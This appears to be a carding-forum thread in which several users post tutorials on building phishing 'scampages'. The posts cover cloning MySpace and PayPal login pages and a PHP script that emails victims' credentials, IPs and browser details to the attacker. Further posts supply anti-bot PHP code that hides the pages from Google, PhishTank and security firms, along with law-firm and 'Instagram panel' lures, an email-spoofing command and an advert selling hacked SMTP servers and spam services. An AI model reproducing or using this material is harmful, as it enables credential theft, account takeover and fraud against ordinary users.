HOW TO MAKE A SCAMPAGE/PHISHING PAGE ?⚠️

[Carder]

Hello! I've seen a lot of requests on different phishing sites, so I decided to make a guide how to create one yourself! Practice makes master!

In the guide, I will make a phishing login page for Myspace. (They got an easy HTML source when it comes to searching. Great to start with..)
Lets get going!

1) Enter MySpace right click on the page and select 'View Source'

2) Now, to make a phishing site we need somewhere to host it! The host needs to have PHP Server scripting enabled.

Ripway Web Hosting and Online File Storage - upload pictures, videos, MP3 and music files and share your files with the world is a very easy one, register an account there and get moving.....

3) Right-Click on the source text and select 'Mark all' then 'Copy' and paste it in Notepad, name it index.php

4) Now we need the create the PHP script, which will enter the information the victim enters into the log in field on the page and redirects them to the real Myspace page.

Please learn the basics of PHP at W3Schools Online Web Tutorials
It is really easy, takes around 15 minutes, then you know it for life.

5) Now, for Myspace you have to make redirecting script , Tutorial available on google!

6) Paste your created redirecting script in Notepad and save it as "redirect.php"

You need to make your own script next time for other pages!

7) Now we will create the log the information we steal will be saved to. Create a new Notepad file and save it "log" (log.txt, but the extension will be added automatically in Windows.

Now, open your index.php again, and lets start search.

9) We will first search for the word "action="

(We're looking for where the user will enter his email and password.)

10) According to the URL this is some sort of search future on Myspace for some Profile, not what we're looking for.

N><A class=languageLink href="http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=1dd14fb6-0f2a-4ab4-a231-b9

11) Hit Search again. As you can see, we're only getting results for MySpace, etc.

12) Lets go back on the Myspace site and check what we need. (MySpace)

13) "Email" is located near the login box!!

14) Great! Lets just go back to the index file and search for "Email". Keep searching a few times!

15) Found it!

16) Now! Look at this line!

<form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">

Delete this:

http://secure.myspace.com/index.cfm?fuseaction=login.process

And replace it with "redirect.php" (which was your redirecting script.

The line will look like this after you are done:

<form action="redirect.php" method="post" id="LoginForm" name="aspnetForm">

17) Save the file by going File -> Save, or simply press CTRL-S (Save hotkey in Windows.)

Now go to your Ripway account and log in. (Ripway Web Hosting and Online File Storage - upload pictures, videos, MP3 and music files and share your files with the world).

19) Upload your files;

- Log.txt
- index.php
- redirect.php

20) Open your index.php online and check if everything correct!

Uploaded files if you lost them and don't want to do it again then you can download the pack with:

- Complete index.php
- redirect.php
- log.txt

 

[Carding 4 Carders]

HOW TO MAKE YOUR OWN SCAM PAGE

1. Open Up the Site that You Want to Make The Fake Page From it, After The Load Right Click and Save Rhe Page as "Web Page Complete"

2. Now open that page with notepad, and press control+F to access search bar, and then search "login" (I recommend using NotePad++)

3. Behind the word "login" it's written .action, we don't need those so delete everything behind the login (this tutorial is for PHP, may you see login.aspx)

4. If You Saw Method="Post" Change it to Method="GET"

5. Ok Now Save it as .Html

6. Open a New Notepad, and Write This Commands

7. Instead of Location: Target.com, Write Your Login Page Address!

8. Now Save this as Login.PHP

9. Go to Website's That offer Free Hosts

10. Upload Website And Done

Scam page is a fake webpage. e.g. a login of a popular website, online bank login and etc. depending on what it is. scam page are used by spammers to collect data on people who get scammed. detecting scam page is simple if you are technology oriented. but most common users can't detect scam page. this is a big problem in the www. some company are developing software to combat scam's or phishing scams - phishing is the term used
for this scam.

1] OK, so first we choose a target.
We chose www.paypal.com

2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer.

3] We open ... There might be a problem, namely the way the image.

4] If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)

5] Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work).

6] You have a code like <form action="login2.php">. Login2.php change in 040147.php!

7] Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username.

8] Good memory.
The password, the code should be similar ( ). So, password is held in variable password. A and memorize it.

9] Now, where you have saved. Html, created a new file called 040147.php.

In it, add the following code:

$ To = "upgoingstar@gmail.com"
$ Name = $ _POST ['email'];
$ Email = $ _POST ['email'];
$ Subject = $ _POST ['subject'];
$ Password = $ _POST ['password'];
$ Agent = $ _SERVER ['HTTP_USER_AGENT'];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
$ D = date ('l dS \ of F Y h: i: s A');
$ Sub = "New Account Hacked PayPal - $ email";
$ Headers = "From: $ name <$ email> \ n";
$ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";
$ Mes .= 'Username:'. $ Email. "\ N";
$ Msg .= "Password:". $ Password. "\ N";
$ Msg .= "Browser:". $ Agent. "\ N";
$ Msg .= "IP:". $ Ip. "\ N";
$ Mes .= 'Date and time:'. $ D;

(
mail ($ to, $ sub, $ mes, $ headers);
header ("Location: www.paypal.com");

)
?>

10] Modify code

$ To = "flowbuzltd@gmail.com"

and put your mail. The code above variables over email and password and sends them together with some more useful details.

11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. Wink.

YOUR SCAMPAGE IS READY NOW. ENJOY SPAMMING ? ?

Note: Look at PHP source, you can see log.txt that's where your victim info's saved.

Auto ScamPage Grabber (150+ always)

A fully private tool made by me which grabs scampages from internet databases.

Grabs different scampages on different days, lots of new scampages everytime.

Grabs 150+ scampages on each run (not necessarily all unique but 50+ of them unique surely).

And new updated on different times as internet databases update regularly.

All proofs and demo available.
Can give video proof too.

Fully private tool and no one has this because it's made by me.

 

[Carding Forum]

HOW TO BLOCK AT THE END OF A BOT​

I will share the experience of how to do a block at the end of the bot.

where this feature can make a scampage become more durable and durable.

Source code for blocking (blockers.php / blocker.php):

<?php
error_reporting(0);
session_start();
/**

Modify by antibot.pw , you can see visitor in https://antibot.pw/manage-blocker

**/
$config['ApiKey']     = 'xxxxxxxxxxxxxxxxxxxxx'; // https://antibot.pw/developers
$config['blocktype']  = '3';

if($_SESSION['check'] == false && !isset($_SESSION['check'])){
  function get_client_ip() {
      $ipaddress = '';
      if (getenv('HTTP_CLIENT_IP')){
          $ipaddress = getenv('HTTP_CLIENT_IP');
      }
      if(getenv('HTTP_X_FORWARDED_FOR')){
          $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
      }
      if(getenv('HTTP_X_FORWARDED')){
          $ipaddress = getenv('HTTP_X_FORWARDED');
      }
      if(getenv('HTTP_FORWARDED_FOR')){
          $ipaddress = getenv('HTTP_FORWARDED_FOR');
      }
      if(getenv('HTTP_FORWARDED')){
         $ipaddress = getenv('HTTP_FORWARDED');
      }
      if(getenv('REMOTE_ADDR')){
          $ipaddress = getenv('REMOTE_ADDR');
      }
      $ipaddress = explode(",",  $ipaddress);
      return $ipaddress[0];
  }
  $ipNe = get_client_ip();
  $curl = curl_init();
  curl_setopt_array($curl, array(
    CURLOPT_URL => "https://antibot.pw/api/check-visitor.php?ip=".$ipNe."&block=".$config['blocktype']."&apikey=".$config['ApiKey'],
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_ENCODING => "",
    CURLOPT_MAXREDIRS => 10,
    CURLOPT_TIMEOUT => 30,
    CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
    CURLOPT_HTTPHEADER => array(
      "content-type: application/x-www-form-urlencoded",
    ),
  ));

  $response = curl_exec($curl);
  $err = curl_error($curl);

  curl_close($curl);

  $json = json_decode($response,true);
  if($json['is_bot'] == 1){
    $_SESSION['check'] = true;
    die(header("HTTP/1.0 404 Not Found"));
  }
}else{
  $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
  $blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit", "msnbot","p3pwgdsn","netcraft","trendmicro", "ebay", "paypal", "torservers", "messagelabs", "sucuri.net", "crawler");
  foreach($blocked_words as $word) {
      if (substr_count($hostname, $word) > 0) {
      header("HTTP/1.0 404 Not Found");
          die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

      }
  }
  $bannedIP = array("^81.161.59.*", "^66.135.200.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*", "^91.103.66.*", "^208.91.115.*", "^199.30.228.*");
  if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
       header('HTTP/1.0 404 Not Found');
       exit();
  } else {
       foreach($bannedIP as $ip) {
            if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
                 header('HTTP/1.0 404 Not Found');
                 die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
            }
       }
  }
}

If you want to make a shortlink with the domain and private hosting, you just need to install the antibot manager.

 

[Teacher]

WHAT IS A PHISHING PAGE?

️A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page,
there password is sent to you.️

Phishing Methods ?

? Public:

Email or DM your target. Ask to buy shoutouts or to see their analytics. Basically just SE your target to somehow login to your phishing link. Not rellay gonna get too detailed on this because its easy and public and idrc for it lol, if u rellay need ig i can help you more with this. The next 2 methods are more detailed.

? Impersonate a law firm:

Create a realistic looking law firm email. Get the targets email through their account (below the 3 methods is another method on how to get emails easier) or with the instagram email database. Write a well thought out email impersonating the law firm and telling your target that they are being investigated for infringement on another person, and html your login link to something like this:

this post is being investigated for infringement.

The target will then get worried and want to see what the problem is, and login using your link.

Once they login, you have the username and password and can simply jack the account.

? Instagram Panel:

I recommend to do this one on a separate device that is on a VPN or proxy, so that you don’t get device or IP banned on Instagram. First message your target with something like this:

Hey, I’ve been doing sales for Instagram requests. Are you interested in this service?

Here are some of the available options

If they ask for a request, tell them that you made a request recently so they will have to wait 2 days. The tell them you are also selling the option to attach the instagram panel to their own account and it will look like this in their settings:

You can tell them that you are willing to give them a 1 day trial of having the panel, and then any more they would have to pay. When they ask how to get it, tell them to login through the german instagram (your phishing link) to get approved and then you will make the approval for a one day trial. If they ask how you are able to do it just SE them into believing u know someone at FB or IG. Once they login then just jack the acc

How to bypass Suspicious Login (Not Verify Account) ️

Note: Suspicious login can only be bypassed if it has NOT already been triggered. Meaning you cannot bypass it if it has already been triggered, but it can be bypassed if you do this on your first attempt.

Get a socks5 proxy service. I recommend vip72. They have soooo many proxies across the world. They also have full directions on how to use it on their site.

Create an account with an SMTP server. Then get kali linux and open the root terminal. type this info in the root for it to work:

$ sendemail -f "the email you want it to look like" -t "target email" -s "smtp port" -xu "smtp username login" -xp "smtp login password" -u"subject" -m "message"

This will spoof the email, and make sure that that the email hits the inbox and not spam.

 

[Mutt]

5 Reasons Why You May Not Be Able To Visit Your Scampage

Wrong Directory

Maybe you uploaded the scampage not on public_www directly. To fix this make sure you delete all files on the public www folder then Upload your zip or rar and extract it correctly.

No Domain Redirect

Usually the site where the cpanel/whm is hosted will be dislayed on the main url. To change this you Upload scampage then you add scampage url to redirect domain settings.

Anti Bots

Some customers told me they can't access their scampage correctly. My antibots only allow clear ip's so don't use:
- VPN
- SOCKS5 (even 911)
- RDP
- ANY PROXY
- TOR

Just use your real IP and it should work.

Phishing detection

If your site gets red ( Google safe browsing phishing warn) then you need to need to select ignore risk. This will not fulfill your goals because everyone listens to Google.

CPanel / WHM has been blacklisted

Sometimes it happen that your cpanel has only a trial and not a Full version. As well as in WHM your ip/site can be blacklisted and then you are not able to visit your hosted site correctly. This happens if noob Carder try to sell you shitty cpanels / whms

 

[Mutt]

HOW TO FIND SOME LEAKED SCAMPAGES

Get your ass over to:

Search Files & Pastes

Search through thousands of files and pastes for Combos, Proxies, Games, and much more.

leaked.wiki

Search for a scampage vendor, scampage website etc...

example:

With a bit luck the file is available and ready for download

HOW TO SETUP SCAMPAGES (ROUGH)

Why "Rough"
- Because not all scampages have same structure.

Which scampage are am using for tutorial
- XWANTED PAYPAL SCAMPAGE

Which issues had the scampage
Noob Leaker Changed Coder Credits (crax pro niggas)
Antibots Detected All Firefox Browser As Bot
Forward To Scampage Failed (=>header("Location: app/index"); changed to header("Location app/index.php")
Wrong Credit Card Mask (19 digits instead of 16)
Images Are Missing (Bank Verification and some other files)
Wrong Language At Double Mail (French instead of the browser language)
Dead BIN API
IP Quality Statement With Invalid API

Did i fixed the issues
- Yes i did!

Changelog of Scampages
Grab Browser Mode (Default or Private)
Remove 403 (Permission denied error)
Added Forwarding To Google With Anonymous Referer
Added Min And Max Date At Date Of Birth
Fixed JavaScript Issues
New Antibots And New Ranges
Better Overview In Bot Log
Optimized Phone Number Lookup

Planned Features:
New Scampage Encoding (not the default encoding - whole scampage + html code)
Email Logins (Like Gmail a fake Gmail Page)
Cookies Grabber (*)
Better Cookie System For Avoiding Bad Humans

* Cookie Grabber Are Effortful And Very Messy

 

[Hola]

Thank you, but how can i download the websites with their assets, like fully cloning them.Good forum

 

[wolfcc1]

Ｈｅｌｌｏ Ｆｒｉｅｎｄｓ
Dm me for all kind of spamming tools
AMAZON HACKED SES SMTP
Aws ses smtp inbox office365
OFFCIE INBOX SENDER
INBOX HACKED SMTP
OFFICE365 TRUE LOGIN
WEBMAIL INBOX
SENDGRIND SMTP INBOX
MAILGUN, GSUITE SMTP INBOX
FUD LINK SERVICE
SCAM PAGE
HTTPS CPANEL/ SHELL
BULLETPROOF CPANEL WITH CUSTOM DOMAIN
FRESH OFFICE 365 Logs
INBOX HTML LETTER
RDP ADMIN PORT 25 OPENED
OFFICE Leads/ALL Domain/Bank LEADS/ Ceo - Cfo Leads...All Email Leads Verified
Method send SMS
Fresh 2021 Blockchain/ Huntington scampage
You can also book for spamming, I spam for you ?guarantee
Serious buyers only
Store: https://wolfcc.ru/
ICQ: @wolfcc
Skype: Wolfcc.ru

 

[adamazdeals]

Please I need someone that can teach how to make scampage with anti bot pls thanks

 

[CarderPlanet]

Short talk about "updating scampage with antibots"....

Is it a good idea ?

Surely this would be the best possible solution to keep the site online longer. But it is as already mentioned in several posts not only the antibots ! There are several facts on which the red page is based so please don't believe every loser who claims "FUD by antibots".

Should I or not?
No, if the page was discovered more than 5-10 times and became red, the code is most likely in the database of Google. I advise to apply for a new one.

What should be considered for a new page ?
Change all filenames, folders and everything around (example: src/includes/ to resources/)
Add new antibots
Change source code a little bit (e.g. other FORM names)

What happens if this does not help?
Then it is either another factor or your antibots continue to let bots through for analysis.